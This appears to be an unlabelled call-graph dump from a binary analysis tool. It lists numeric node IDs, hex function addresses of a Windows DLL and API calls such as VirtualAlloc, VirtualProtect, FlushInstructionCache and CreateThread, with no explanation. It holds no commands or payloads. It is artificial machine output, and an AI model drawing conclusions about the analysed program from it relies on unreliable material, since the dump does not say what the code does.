15711->15712 15717 18002a109 15711->15717 15713 18002a118 15712->15713 15714 18002a0fc 15712->15714 15718 180029d00 15713->15718 15716 180029d00 77 API calls 15714->15716 15714->15717 15716->15717 15719 180029d4b 15718->15719 15720 180004410 77 API calls 15719->15720 15721 180029d75 15719->15721 15720->15721 15721->15717 13630 180015e10 13631 180015e21 13630->13631 13632 180015e30 13630->13632 13636 1800e94c4 13632->13636 13635 180015e3c 13635->13631 13648 1800e959b 13635->13648 13637 1800e94d8 13636->13637 13645 1800e952a 13636->13645 13638 1800e953c 13637->13638 13639 1800e94e8 13637->13639 13675 1800f49b0 13638->13675 13641 1800e9511 13639->13641 13674 1800f4690 SleepConditionVariableSRW 13639->13674 13642 1800f49b0 77 API calls 13641->13642 13641->13645 13644 1800e9562 13642->13644 13681 1800a2a20 13644->13681 13645->13635 13649 1800e95b3 13648->13649 13652 1800e95ce 13649->13652 13653 1800e95f3 13649->13653 13658 1800e95df 13649->13658 13650 1800f49b0 77 API calls 13651 1800e9619 13650->13651 13655 1800a2a20 77 API calls 13651->13655 13656 1800e95e3 13652->13656 13901 1800f4670 WakeAllConditionVariable 13652->13901 13654 1800f49b0 77 API calls 13653->13654 13654->13658 13659 1800e9621 13655->13659 13656->13631 13658->13650 13658->13656 13661 1800e9677 13659->13661 13662 1800e9652 13659->13662 13669 1800e9663 13659->13669 13660 1800f49b0 77 API calls 13663 1800e969d 13660->13663 13665 1800f49b0 77 API calls 13661->13665 13664 1800e9667 13662->13664 13902 1800f4670 WakeAllConditionVariable 13662->13902 13666 1800a2a20 77 API calls 13663->13666 13664->13631 13665->13669 13668 1800e96a5 13666->13668 13670 1800f49b0 77 API calls 13668->13670 13669->13660 13669->13664 13671 1800e96c0 13670->13671 13672 1800f49b0 77 API calls 13671->13672 13673 1800e96e0 13672->13673 13674->13639 13676 1800f49d6 13675->13676 13680 1800f4a93 13676->13680 13692 180004460 13676->13692 13679 1800f4a5d EnterCriticalSection LeaveCriticalSection 13679->13680 13680->13641 13840 1800eaa40 13681->13840 13695 180008570 13692->13695 13694 180004490 13694->13679 13694->13680 13708 1800080f0 13695->13708 13697 18000863b 13697->13694 13698 180008587 13698->13697 13699 1800085c2 13698->13699 13700 180008625 13698->13700 13702 180008627 13699->13702 13703 1800085cb EnterCriticalSection 13699->13703 13758 180007410 13700->13758 13742 1800030a0 13702->13742 13734 180002000 13703->13734 13706 1800085f7 LeaveCriticalSection 13706->13697 13709 18000811f AcquireSRWLockExclusive 13708->13709 13722 180008144 13708->13722 13710 180008138 ReleaseSRWLockExclusive 13709->13710 13709->13722 13710->13722 13711 180008158 13711->13698 13712 1800e94c4 66 API calls 13712->13722 13713 1800081a0 GetEnvironmentVariableA 13714 18000837a InitializeCriticalSectionAndSpinCount InitializeCriticalSectionAndSpinCount InitializeCriticalSectionAndSpinCount InitializeCriticalSectionAndSpinCount 13713->13714 13713->13722 13714->13722 13715 18000850d GetSystemInfo 13716 1800e959b 66 API calls 13715->13716 13716->13722 13718 180008534 13720 1800080f0 66 API calls 13718->13720 13719 180008463 InitializeCriticalSectionAndSpinCount 13776 180005e20 EnterCriticalSection 13719->13776 13723 180008587 13720->13723 13722->13710 13722->13711 13722->13712 13722->13713 13722->13714 13722->13715 13722->13718 13722->13719 13767 1800041e0 EnterCriticalSection 13722->13767 13724 1800085c2 13723->13724 13728 180008625 13723->13728 13730 18000863b 13723->13730 13726 180008627 13724->13726 13727 1800085cb EnterCriticalSection 13724->13727 13725 180007410 29 API calls 13725->13730 13729 1800030a0 32 API calls 13726->13729 13731 180002000 26 API calls 13727->13731 13728->13725 13729->13730 13730->13698 13732 1800085f7 LeaveCriticalSection 13731->13732 13732->13730 13735 18000203a 13734->13735 13736 180002190 24 API calls 13735->13736 13738 1800020a9 13735->13738 13737 1800020e1 13736->13737 13741 180002150 13737->13741 13825 180001960 13737->13825 13830 180001570 13738->13830 13741->13706 13743 1800030da EnterCriticalSection 13742->13743 13757 18000322d 13742->13757 13744 180003118 LeaveCriticalSection 13743->13744 13745 1800030ff LeaveCriticalSection 13743->13745 13747 180005e20 24 API calls 13744->13747 13746 18000312f 13745->13746 13748 180002190 24 API calls 13746->13748 13746->13757 13747->13746 13749 18000314e 13748->13749 13750 180003157 13749->13750 13751 18000322f EnterCriticalSection LeaveCriticalSection 13749->13751 13752 180003181 EnterCriticalSection 13750->13752 13751->13757 13834 1800093c0 13752->13834 13754 1800031b3 LeaveCriticalSection 13755 1800031d3 13754->13755 13754->13757 13756 180003200 VirtualFree 13755->13756 13755->13757 13756->13755 13756->13757 13757->13697 13759 18000743e EnterCriticalSection 13758->13759 13761 1800074f5 13759->13761 13765 1800074ff 13761->13765 13836 180002cd0 13761->13836 13763 18000768c LeaveCriticalSection 13764 180007665 13763->13764 13764->13697 13765->13763 13766 180007653 LeaveCriticalSection 13765->13766 13766->13764 13768 180004221 LeaveCriticalSection 13767->13768 13769 18000423a LeaveCriticalSection 13767->13769 13771 180004251 13768->13771 13770 180005e20 24 API calls 13769->13770 13770->13771 13772 18000426b EnterCriticalSection 13771->13772 13773 180004338 13771->13773 13774 18000427c 13772->13774 13773->13722 13775 18000432f LeaveCriticalSection 13774->13775 13775->13773 13777 180005e62 13776->13777 13782 180005f22 13776->13782 13786 180002190 13777->13786 13779 180005fd5 13780 180005ff4 LeaveCriticalSection 13779->13780 13780->13722 13781 180005fa0 VirtualAlloc 13781->13780 13781->13782 13782->13779 13782->13781 13783 180005e86 13783->13780 13783->13782 13784 180005ef0 VirtualFree 13783->13784 13784->13783 13785 180006014 13784->13785 13787 180002268 VirtualAlloc 13786->13787 13788 1800021c0 13786->13788 13789 1800022ec 13787->13789 13790 18000228b 13787->13790 13788->13787 13792 1800021d8 EnterCriticalSection 13788->13792 13793 18000240d 13789->13793 13795 180002353 EnterCriticalSection 13789->13795 13790->13789 13791 180002298 VirtualFree 13790->13791 13798 1800022ad 13791->13798 13794 18000225b LeaveCriticalSection 13792->13794 13797 1800021f4 13792->13797 13793->13783 13794->13787 13802 180002380 13795->13802 13796 180002300 VirtualAlloc 13796->13789 13796->13798 13797->13794 13804 180002233 13797->13804 13798->13789 13798->13796 13819 180005d50 VirtualFree 13798->13819 13799 1800023d3 LeaveCriticalSection 13799->13793 13800 180005e20 7 API calls 13800->13802 13802->13799 13802->13800 13803 1800023f2 LeaveCriticalSection 13802->13803 13803->13793 13805 1800024f2 13804->13805 13809 180002488 13804->13809 13806 1800024f7 LeaveCriticalSection EnterCriticalSection 13805->13806 13810 180002563 13805->13810 13807 1800025a3 LeaveCriticalSection 13806->13807 13808 1800025e0 VirtualAlloc 13807->13808 13808->13787 13811 1800025fd 13808->13811 13809->13810 13813 1800024b3 LeaveCriticalSection EnterCriticalSection 13809->13813 13810->13807 13811->13808 13812 180002618 13811->13812 13812->13787 13812->13789 13814 180002533 LeaveCriticalSection 13813->13814 13815 1800024d9 LeaveCriticalSection 13813->13815 13817 180005e20 7 API calls 13814->13817 13816 180002556 EnterCriticalSection 13815->13816 13816->13810 13818 18000254a 13817->13818 13818->13812 13818->13816 13820 180005da1 VirtualAlloc 13819->13820 13821 180005d72 13819->13821 13822 180005dbe 13820->13822 13824 180005dda 13820->13824 13821->13820 13823 180005dc3 VirtualFree 13822->13823 13822->13824 13823->13824 13824->13798 13827 1800019c0 13825->13827 13826 180001a30 VirtualFree 13826->13827 13828 180001a86 13826->13828 13827->13826 13829 180001a5e 13827->13829 13828->13738 13829->13738 13831 1800017af 13830->13831 13833 1800015f3 13830->13833 13831->13741 13832 1800016e0 VirtualAlloc 13832->13833 13833->13831 13833->13832 13835 1800093f3 13834->13835 13835->13754 13837 180002d18 13836->13837 13839 180002ce2 13836->13839 13838 180002000 26 API calls 13837->13838 13838->13839 13839->13765 13839->13839 13859 1800f5510 13840->13859 13843 1800eb0e0 77 API calls 13845 1800eaaad 13843->13845 13844 1800a2a29 13848 1800eb0e0 13844->13848 13846 1800a2a20 77 API calls 13845->13846 13847 1800eaab5 13846->13847 13874 1800f55a0 13848->13874 13850 1800eb0ea 13852 1800eb113 13850->13852 13884 1800eb180 13850->13884 13853 1800eb180 77 API calls 13852->13853 13854 1800eb11c 13853->13854 13855 1800a2a20 77 API calls 13854->13855 13856 1800eb124 13855->13856 13857 1800a2a20 77 API calls 13856->13857 13858 1800eb12c 13857->13858 13860 1800f5528 13859->13860 13861 1800f552c 13860->13861 13862 1800f5571 13860->13862 13864 1800eaa51 13861->13864 13871 1800f51c0 13861->13871 13863 1800f49b0 77 API calls 13862->13863 13867 1800f554e 13863->13867 13864->13843 13864->13844 13865 1800f49b0 77 API calls 13869 1800f5553 13865->13869 13867->13865 13867->13869 13868 1800f49b0 77 API calls 13870 1800f5595 13868->13870 13869->13864 13869->13868 13872 180004460 77 API calls 13871->13872 13873 1800f51d4 13872->13873 13873->13867 13875 1800f55b7 13874->13875 13876 1800f49b0 77 API calls 13875->13876 13877 1800f55d6 13876->13877 13878 1800f55fb 13877->13878 13879 1800f49b0 77 API calls 13877->13879 13878->13850 13880 1800f560c 13879->13880 13881 1800f562a 13880->13881 13882 1800f49b0 77 API calls 13880->13882 13881->13850 13883 1800f563b 13882->13883 13885 1800eb187 13884->13885 13886 1800f49b0 77 API calls 13885->13886 13887 1800eb193 13886->13887 13888 1800eaa40 77 API calls 13887->13888 13889 1800eb19b 13888->13889 13890 1800f49b0 77 API calls 13889->13890 13891 1800eb1a7 13890->13891 13898 1800eac50 13891->13898 13893 1800eb1af 13894 1800a2a20 77 API calls 13893->13894 13895 1800eb1b7 13894->13895 13896 1800a2a20 77 API calls 13895->13896 13897 1800eb1bf 13896->13897 13899 1800f55a0 77 API calls 13898->13899 13900 1800eac5b 13899->13900 13900->13893 13901->13658 13902->13669 15579 180015f90 GetCurrentThreadId 15580 180015fad 15579->15580 13903 180004810 13904 1800048d7 13903->13904 13905 18000483a 13903->13905 13906 1800e94c4 77 API calls 13904->13906 13907 1800080f0 77 API calls 13905->13907 13908 1800048e3 13906->13908 13912 180004846 13907->13912 13908->13905 13909 1800048eb GetSystemInfo 13908->13909 13910 1800e959b 77 API calls 13909->13910 13910->13905 13911 1800048cf 13912->13911 13913 18000498b EnterCriticalSection 13912->13913 13915 1800049a4 LeaveCriticalSection 13913->13915 13915->13911 13916 180005210 13917 1800080f0 77 API calls 13916->13917 13918 18000521d 13917->13918 13919 180005232 13918->13919 13920 1800041e0 29 API calls 13918->13920 13920->13919 13921 180002e10 EnterCriticalSection 13922 180002000 26 API calls 13921->13922 13923 180002e4d 13922->13923 13924 180002f1d LeaveCriticalSection 13923->13924 14575 180005050 14576 180005060 14575->14576 14577 180005093 EnterCriticalSection 14576->14577 14580 180005177 14576->14580 14579 1800050b2 14577->14579 14578 18000518a 14581 18000516a LeaveCriticalSection 14579->14581 14586 180005140 EnterCriticalSection 14579->14586 14580->14578 14582 1800080f0 77 API calls 14580->14582 14581->14580 14583 1800051bc 14582->14583 14584 1800051d5 14583->14584 14585 1800041e0 29 API calls 14583->14585 14585->14584 14589 180002650 14586->14589 14590 18000281e LeaveCriticalSection 14589->14590 14591 180002687 14589->14591 14590->14579 14591->14590 14592 1800027d0 VirtualFree 14591->14592 14592->14591 14593 18000282f 14592->14593 14594 180005a50 14595 180005a88 14594->14595 14596 180005a60 14594->14596 14596->14595 14597 180005abb EnterCriticalSection 14596->14597 14599 180005ad4 LeaveCriticalSection 14597->14599 14599->14595 14600 180004750 14601 180004768 14600->14601 14602 1800080f0 77 API calls 14601->14602 14603 180004787 14601->14603 14602->14603 14604 18000ff50 14605 18000ba90 99 API calls 14604->14605 14606 18000ff93 14605->14606 14607 18000ffdc GetCurrentThreadId 14606->14607 14608 18000ffed 14606->14608 14607->14608 14609 180010088 14608->14609 14610 18000fffd 14608->14610 14611 180024b50 99 API calls 14609->14611 14650 180024b50 14610->14650 14614 18001002b 14611->14614 14613 180010077 14614->14613 14615 1800100f3 GetCurrentThreadId 14614->14615 14617 180010104 14614->14617 14615->14617 14616 180010152 14617->14616 14618 180010197 GetCurrentThreadId 14617->14618 14620 1800101a8 14617->14620 14618->14620 14619 180010214 14620->14619 14621 180010277 GetCurrentThreadId 14620->14621 14623 180010288 14620->14623 14621->14623 14622 1800102f4 14623->14622 14624 180010347 GetCurrentThreadId 14623->14624 14627 180010358 14623->14627 14624->14627 14625 1800104c2 InitializeConditionVariable 14664 18002ac90 14625->14664 14627->14625 14629 1800103ed 14627->14629 14631 18000ba90 99 API calls 14627->14631 14628 180010530 14630 180010552 GetCurrentThreadId 14628->14630 14633 180010563 14628->14633 14630->14633 14632 180010472 14631->14632 14632->14625 14634 1800105d4 GetCurrentThreadId 14633->14634 14635 1800105e9 14633->14635 14648 18001062b 14633->14648 14634->14635 14638 18000dd30 108 API calls 14635->14638 14635->14648 14637 18000ba90 99 API calls 14639 18001066a 14637->14639 14640 18001075e 14638->14640 14671 18003bd00 14639->14671 14641 18001078c 14640->14641 14642 180010777 GetCurrentThreadId 14640->14642 14643 1800107a4 14641->14643 14644 18001082d 14641->14644 14642->14641 14678 18002b5c0 14643->14678 14647 18002b5c0 108 API calls 14644->14647 14645 1800106cc 14646 180010850 6 API calls 14645->14646 14646->14629 14647->14648 14648->14637 14648->14639 14651 180024c20 14650->14651 14689 180025ba0 14651->14689 14654 180024c53 14655 180025ba0 77 API calls 14654->14655 14658 180024de4 14654->14658 14693 1800267e0 14654->14693 14655->14654 14656 180024ee1 14657 1800267e0 99 API calls 14657->14658 14658->14656 14658->14657 14659 180025ba0 77 API calls 14658->14659 14660 180024e44 14658->14660 14659->14658 14660->14656 14709 1800259a0 14660->14709 14662 180024e6e 14713 18000eb00 14662->14713 14665 18002acbc GetCurrentThreadId 14664->14665 14666 18002accd 14664->14666 14665->14666 14667 18002ad50 5 API calls 14666->14667 14668 18002ace2 14667->14668 14814 18002ae90 14668->14814 14670 18002ad0b 14670->14628 14672 18003bd41 14671->14672 14673 18003bd30 GetCurrentThreadId 14671->14673 14674 180023170 103 API calls 14672->14674 14677 18003bd8f 14672->14677 14673->14672 14675 18003bd6c 14674->14675 14676 180052ce0 4 API calls 14675->14676 14675->14677 14676->14677 14677->14645 14679 18002b622 14678->14679 14680 180025ba0 77 API calls 14679->14680 14686 18002b64b 14680->14686 14681 1800267e0 99 API calls 14681->14686 14682 180025ba0 77 API calls 14682->14686 14683 18002b6d3 14683->14648 14684 18000dd30 108 API calls 14688 18002b674 14684->14688 14685 1800267e0 99 API calls 14685->14688 14686->14681 14686->14682 14686->14688 14687 180025ba0 77 API calls 14687->14688 14688->14683 14688->14684 14688->14685 14688->14687 14690 180025bd7 14689->14690 14692 180025c24 14689->14692 14691 1800a0650 77 API calls 14690->14691 14691->14692 14692->14654 14694 1800268bb 14693->14694 14695 1800247d0 99 API calls 14694->14695 14696 180026ac2 14695->14696 14697 180025ba0 77 API calls 14696->14697 14698 180026c0f 14697->14698 14699 1800224f0 99 API calls 14698->14699 14700 180026c70 14699->14700 14701 1800224f0 99 API calls 14700->14701 14702 180026ca5 14701->14702 14703 1800224f0 99 API calls 14702->14703 14704 180026ce0 14703->14704 14705 180025ba0 77 API calls 14704->14705 14706 180027fd6 14705->14706 14707 1800267e0 99 API calls 14706->14707 14708 180029481 14706->14708 14707->14708 14708->14654 14710 1800259ce 14709->14710 14711 18000ba90 99 API calls 14710->14711 14712 1800259e1 14710->14712 14711->14712 14712->14662 14716 18000eb43 14713->14716 14715 18000edd8 14715->14656 14717 18000ed94 14716->14717 14722 18000f750 14716->14722 14717->14715 14751 18000eea0 14717->14751 14719 18000ee61 14720 18000eb00 99 API calls 14719->14720 14721 18000ee6e 14720->14721 14721->14656 14723 1800224f0 99 API calls 14722->14723 14724 18000f7b5 14723->14724 14732 18000fb92 14724->14732 14757 18000fe00 14724->14757 14726 18000f81f 14727 18000f862 14726->14727 14730 1800247d0 99 API calls 14726->14730 14728 1800247d0 99 API calls 14727->14728 14729 18000f894 14728->14729 14731 18000f8f2 14729->14731 14734 1800247d0 99 API calls 14729->14734 14730->14726 14765 180024a30 14731->14765 14732->14717 14734->14729 14735 18000f913 14736 18000f9b2 14735->14736 14738 18000f962 14735->14738 14740 1800247d0 99 API calls 14735->14740 14737 18000fa52 14736->14737 14739 18000fa02 14736->14739 14741 1800247d0 99 API calls 14736->14741 14737->14732 14743 1800247d0 99 API calls 14737->14743 14745 18000fab2 14737->14745 14738->14732 14742 1800247d0 99 API calls 14738->14742 14739->14732 14744 1800247d0 99 API calls 14739->14744 14740->14735 14741->14736 14742->14736 14743->14737 14744->14737 14745->14732 14746 1800247d0 99 API calls 14745->14746 14747 18000fb02 14746->14747 14748 1800247d0 99 API calls 14747->14748 14749 18000fb42 14747->14749 14748->14747 14749->14732 14750 1800247d0 99 API calls 14749->14750 14750->14732 14752 18000ef07 14751->14752 14756 18000f18a 14752->14756 14793 180038f90 14752->14793 14754 18000f1a8 14754->14756 14800 18000f5a0 14754->14800 14756->14719 14758 18000fe63 14757->14758 14759 18000fe33 14757->14759 14770 1800112f0 14758->14770 14759->14758 14761 1800247d0 99 API calls 14759->14761 14761->14759 14762 18000fe7b 14763 1800247d0 99 API calls 14762->14763 14764 18000feba 14762->14764 14763->14764 14764->14726 14787 1800986a0 14765->14787 14767 180024a67 14768 1800247d0 99 API calls 14767->14768 14769 180024b0f 14768->14769 14769->14735 14772 18001132d 14770->14772 14775 18001158e 14772->14775 14776 18003c300 14772->14776 14774 180022750 99 API calls 14774->14775 14775->14762 14777 18003c31a 14776->14777 14782 1800115ae 14776->14782 14778 18003c348 14777->14778 14780 18003c32c 14777->14780 14783 18003bf40 14778->14783 14781 18003bf40 77 API calls 14780->14781 14780->14782 14781->14782 14782->14774 14782->14775 14784 18003bf76 14783->14784 14785 180004410 77 API calls 14784->14785 14786 18003bfa9 14784->14786 14785->14786 14786->14782 14788 1800986ba 14787->14788 14789 1800986ae 14787->14789 14790 1800e94c4 77 API calls 14788->14790 14789->14767 14791 1800986c6 14790->14791 14791->14789 14792 1800e959b 77 API calls 14791->14792 14792->14789 14794 180038faa 14793->14794 14799 180038fc9 14793->14799 14795 180038fd8 14794->14795 14796 180038fbc 14794->14796 14810 180039210 14795->14810 14798 180039210 77 API calls 14796->14798 14796->14799 14798->14799 14799->14754 14799->14799 14801 1800224f0 99 API calls 14800->14801 14802 18000f5e8 14801->14802 14803 18000f632 14802->14803 14805 18000f5ee 14802->14805 14804 1800247d0 99 API calls 14803->14804 14807 18000f62d 14804->14807 14806 1800247d0 99 API calls 14805->14806 14809 18000f68a 14805->14809 14806->14807 14808 1800247d0 99 API calls 14807->14808 14807->14809 14808->14809 14809->14756 14811 180039243 14810->14811 14812 180004410 77 API calls 14811->14812 14813 180039271 14811->14813 14812->14813 14813->14799 14815 18002aee2 14814->14815 14816 18000ba90 99 API calls 14815->14816 14817 18002af9f InitializeConditionVariable GetCurrentThreadId 14816->14817 14818 18002afe3 14817->14818 14819 18002b011 14818->14819 14820 180023680 GetCurrentThreadId 14818->14820 14821 180023380 103 API calls 14819->14821 14820->14819 14822 18002b01c 14821->14822 14822->14670 15581 18000e690 15582 18000e6ab GetCurrentThreadId 15581->15582 15583 18000e6bc 15581->15583 15582->15583 15584 18000e6f2 GetCurrentThreadId 15583->15584 15585 18000e703 15583->15585 15584->15585 15586 18000e741 GetCurrentThreadId 15585->15586 15588 18000e752 15585->15588 15586->15588 15587 18000e794 15588->15587 15589 18000dd30 108 API calls 15588->15589 15590 18000e8a8 15589->15590 15591 18000e8b8 15590->15591 15593 18000dee0 15590->15593 15594 18000dd30 108 API calls 15593->15594 15595 18000df31 15594->15595 15596 18000dd30 108 API calls 15595->15596 15607 18000df50 15596->15607 15597 18000e02b 15598 18000e055 15597->15598 15599 18000dd30 108 API calls 15597->15599 15600 18000e081 15598->15600 15602 18000dd30 108 API calls 15598->15602 15599->15598 15603 18000e0ad 15600->15603 15604 18000dd30 108 API calls 15600->15604 15601 18000dfc4 15608 1800a0650 77 API calls 15601->15608 15602->15600 15606 18000dd30 108 API calls 15603->15606 15610 18000e0d1 15603->15610 15604->15603 15605 18000dd30 108 API calls 15605->15607 15606->15610 15607->15597 15607->15601 15607->15605 15609 18000e009 15608->15609 15611 18000dd30 108 API calls 15609->15611 15612 18000e123 GetCurrentThreadId 15610->15612 15613 18000e0e2 15610->15613 15611->15597 15612->15613 15613->15591 15722 18000ead0 15723 18000eb00 99 API calls 15722->15723 15724 18000eae3 15723->15724 13570 17523531378 13571 175235313a0 13570->13571 13572 17523531381 CreateThread 13570->13572 13572->13571 14823 180005852 14824 18000589e 14823->14824 14825 180005890 14823->14825 14828 1800086c0 99 API calls 14824->14828 14829 18000594e 14824->14829 14825->14824 14826 1800058cc EnterCriticalSection 14825->14826 14827 1800058f0 LeaveCriticalSection 14826->14827 14827->14824 14828->14829 14831 1800059e3 EnterCriticalSection 14829->14831 14832 18000597c 14829->14832 14833 180005a00 LeaveCriticalSection 14831->14833 14833->14832 15614 1800e9ea0 15615 1800e9ec2 15614->15615 15616 1800e9f03 15615->15616 15617 1800e9f43 VirtualQuery 15615->15617 15618 1800e9ff2 15615->15618 15617->15618 15622 1800e9f6f 15617->15622 15619 1800ea020 GetLastError 15618->15619 15620 1800ea034 15619->15620 15621 1800e9fa1 VirtualProtect 15621->15616 15621->15619 15622->15616 15622->15621 14835 180051560 14836 180051590 8 API calls 14835->14836 14837 180051583 14836->14837 15725 1800438e0 15727 180043913 15725->15727 15728 180043935 15725->15728 15726 18004394e 15727->15728 15742 180043fc0 15727->15742 15728->15726 15730 180043b44 EnterCriticalSection LeaveCriticalSection 15728->15730 15731 1800e94c4 77 API calls 15728->15731 15732 180043b88 15731->15732 15732->15730 15735 180043b8c InitializeCriticalSectionEx 15732->15735 15733 18003ff90 167 API calls 15733->15728 15734 180043985 15739 1800439c0 15734->15739 15740 180043a91 15734->15740 15794 18003fc80 15734->15794 15737 1800e959b 77 API calls 15735->15737 15738 180043bb7 15737->15738 15738->15730 15739->15740 15741 180043a6c GetCurrentProcess FlushInstructionCache 15739->15741 15740->15733 15741->15740 15743 180043fff 15742->15743 15747 1800440bf 15743->15747 15801 180042420 15743->15801 15748 180044386 15747->15748 15749 18004440d EnterCriticalSection 15747->15749 15750 1800e94c4 77 API calls 15747->15750 15748->15734 15751 180043680 81 API calls 15749->15751 15752 180044974 15750->15752 15753 18004442b LeaveCriticalSection 15751->15753 15752->15749 15754 18004497c InitializeCriticalSectionEx 15752->15754 15755 18004443e EncodePointer 15753->15755 15762 1800444a5 15753->15762 15756 1800e959b 77 API calls 15754->15756 15757 180044498 EncodePointer 15755->15757 15759 1800449a7 15756->15759 15771 1800444db 15757->15771 15758 18003ff90 167 API calls 15758->15747 15759->15749 15760 1800447e3 15760->15734 15762->15760 15764 1800449ec 15762->15764 15765 18003fc80 99 API calls 15762->15765 15766 180044a23 15764->15766 15767 18003fc80 99 API calls 15764->15767 15765->15764 15768 180044a5e 15766->15768 15769 18003fc80 99 API calls 15766->15769 15767->15766 15770 180044ae6 15768->15770 15772 18003fc80 99 API calls 15768->15772 15769->15768 15774 180044b1d 15770->15774 15777 18003fc80 99 API calls 15770->15777 15773 180044753 15771->15773 15776 1800445e0 15771->15776 15781 18003fc80 99 API calls 15771->15781 15772->15770 15778 180044793 15773->15778 15779 180044784 VirtualProtect 15773->15779 15775 180044b54 15774->15775 15780 18003fc80 99 API calls 15774->15780 15775->15734 15782 18004461b 15776->15782 15783 18003fc80 99 API calls 15776->15783 15777->15774 15778->15762 15784 1800447b5 VirtualProtect 15778->15784 15779->15778 15780->15775 15781->15776 15785 180044677 15782->15785 15786 18003fc80 99 API calls 15782->15786 15783->15782 15784->15762 15787 1800446ae 15785->15787 15788 18003fc80 99 API calls 15785->15788 15786->15785 15789 1800446e5 15787->15789 15790 18003fc80 99 API calls 15787->15790 15788->15787 15791 18004471c 15789->15791 15792 18003fc80 99 API calls 15789->15792 15790->15789 15791->15773 15793 18003fc80 99 API calls 15791->15793 15792->15791 15793->15773 15798 18003fc94 15794->15798 15795 18003fd31 15797 180004410 77 API calls 15795->15797 15796 18003fe19 15799 1800044b0 99 API calls 15796->15799 15800 18003fd41 15797->15800 15798->15795 15798->15796 15798->15800 15799->15800 15800->15739 15804 180042447 15801->15804 15802 18004251b 15802->15747 15809 18003f7a0 15802->15809 15803 1800e94c4 77 API calls 15803->15804 15804->15802 15804->15803 15805 180042541 GetSystemInfo 15804->15805 15806 1800424a7 NtQueryVirtualMemory 15804->15806 15807 1800e959b 77 API calls 15805->15807 15806->15804 15808 1800424fb RtlNtStatusToDosError RtlSetLastWin32Error 15806->15808 15807->15804 15808->15804 15810 18003f9b2 15809->15810 15815 18003f7ef 15809->15815 15811 1800e94c4 77 API calls 15810->15811 15812 18003f9be 15811->15812 15813 18003f9c6 GetSystemInfo 15812->15813 15812->15815 15814 1800e959b 77 API calls 15813->15814 15814->15815 15817 18003f886 VirtualProtect 15815->15817 15818 18003f8cb 15815->15818 15823 18003f95f 15815->15823 15831 18003fa70 15815->15831 15816 18003f94e 15816->15758 15817->15815 15817->15818 15818->15816 15819 1800e94c4 77 API calls 15818->15819 15821 18003f910 VirtualProtect 15818->15821 15822 18003fa05 GetSystemInfo 15818->15822 15819->15818 15821->15818 15821->15821 15824 1800e959b 77 API calls 15822->15824 15825 18003f96d 15823->15825 15826 1800e94c4 77 API calls 15823->15826 15824->15818 15825->15818 15827 18003f992 VirtualProtect 15825->15827 15828 18003fa37 15826->15828 15827->15818 15827->15827 15828->15825 15829 18003fa3f GetSystemInfo 15828->15829 15830 1800e959b 77 API calls 15829->15830 15830->15825 15835 18003fa84 15831->15835 15832 18003fb0f 15834 180004410 77 API calls 15832->15834 15837 18003fb3b 15832->15837 15833 18003fb32 15836 180004410 77 API calls 15833->15836 15833->15837 15834->15837 15835->15832 15835->15833 15835->15837 15836->15837 15837->15815 15838 18003ace0 15847 18003add0 15838->15847 15840 18003ad0b 15841 180010850 6 API calls 15840->15841 15842 18003ad8e 15840->15842 15843 18003ad34 15841->15843 15843->15842 15844 180010850 6 API calls 15843->15844 15845 18003ad6d 15844->15845 15845->15842 15846 180010850 6 API calls 15845->15846 15846->15842 15854 18003aeb0 15847->15854 15849 18003adfa 15850 18003ae10 GetCurrentThreadId 15849->15850 15851 18003ae21 15849->15851 15853 18003ae72 15849->15853 15850->15851 15852 180010850 6 API calls 15851->15852 15851->15853 15852->15853 15853->15840 15855 18003aefd 15854->15855 15857 18003af42 15854->15857 15856 18000ba90 99 API calls 15855->15856 15855->15857 15858 18003af80 InitializeConditionVariable 15856->15858 15857->15849 15860 18003b050 15858->15860 15861 18003b07f 15860->15861 15862 18003b0c8 15860->15862 15861->15862 15863 1800a0650 77 API calls 15861->15863 15862->15857 15864 18003b130 15863->15864 15864->15862 15865 18003b15f GetCurrentThreadId 15864->15865 15866 18003b174 15864->15866 15865->15866 15866->15862 15867 18003b239 15866->15867 15869 18003b1a8 GetCurrentThreadId 15866->15869 15877 18003b2e6 15866->15877 15868 18000ba90 99 API calls 15867->15868 15870 18003b243 15868->15870 15869->15866 15871 18000ba90 99 API calls 15870->15871 15872 18003b27e 15871->15872 15876 18002b700 111 API calls 15872->15876 15873 18003b327 GetCurrentThreadId 15874 18003b339 15873->15874 15882 18003b4f0 15874->15882 15876->15877 15877->15873 15877->15874 15878 18003b362 15879 1800a0650 77 API calls 15878->15879 15880 18003b3ad 15879->15880 15881 1800a0650 77 API calls 15880->15881 15881->15862 15883 18003b535 15882->15883 15884 18003b76d 15882->15884 15885 180023170 103 API calls 15883->15885 15891 18003b553 15883->15891 15884->15878 15885->15891 15886 180023170 103 API calls 15886->15891 15887 18003b654 15895 1800339e0 15887->15895 15889 18003b6e5 15908 18003b830 15889->15908 15891->15884 15891->15886 15891->15887 15893 18003b7ea 15891->15893 15892 18003b6ef 15892->15878 15894 180023380 103 API calls 15893->15894 15894->15884 15899 1800339f3 15895->15899 15896 180033bc3 15897 180033bd3 15896->15897 15900 180033be4 GetCurrentThreadId 15896->15900 15897->15889 15898 180052ce0 4 API calls 15901 180033b5a 15898->15901 15899->15896 15899->15898 15902 180033c39 15900->15902 15901->15896 15903 180023380 103 API calls 15901->15903 15905 180033c6c 15902->15905 15914 180033e00 15902->15914 15903->15896 15906 180033cc8 GetCurrentThreadId 15905->15906 15907 180033cdf 15905->15907 15906->15907 15907->15889 15909 18003b963 15908->15909 15911 18003b859 15908->15911 15909->15892 15910 180052ce0 4 API calls 15912 18003b8fa 15910->15912 15911->15910 15912->15909 15913 180023380 103 API calls 15912->15913 15913->15909 15916 180033e43 15914->15916 15915 18000ba90 99 API calls 15917 180033f9a 15915->15917 15916->15915 15916->15917 15917->15905 14838 18002bf60 14839 18002bf80 14838->14839 14840 18002bfa6 14839->14840 14841 18002bf90 14839->14841 14846 18002bd80 77 API calls 14840->14846 14849 18002bf9f 14840->14849 14842 18002bf94 14841->14842 14843 18002bfd2 14841->14843 14850 18002bd80 14842->14850 14845 18002bd80 77 API calls 14843->14845 14847 18002bfb7 14845->14847 14846->14847 14848 18002bd80 77 API calls 14847->14848 14847->14849 14848->14849 14851 18002bdc4 14850->14851 14867 18002c7d0 14851->14867 14854 18002c7d0 77 API calls 14856 18002be42 14854->14856 14855 18002beb0 14855->14849 14856->14855 14857 18002bfa6 14856->14857 14858 18002bf90 14856->14858 14861 18002bf9f 14857->14861 14864 18002bd80 77 API calls 14857->14864 14859 18002bf94 14858->14859 14860 18002bfd2 14858->14860 14862 18002bd80 77 API calls 14859->14862 14863 18002bd80 77 API calls 14860->14863 14861->14849 14862->14861 14865 18002bfb7 14863->14865 14864->14865 14865->14861 14866 18002bd80 77 API calls 14865->14866 14866->14861 14868 18002c7e2 14867->14868 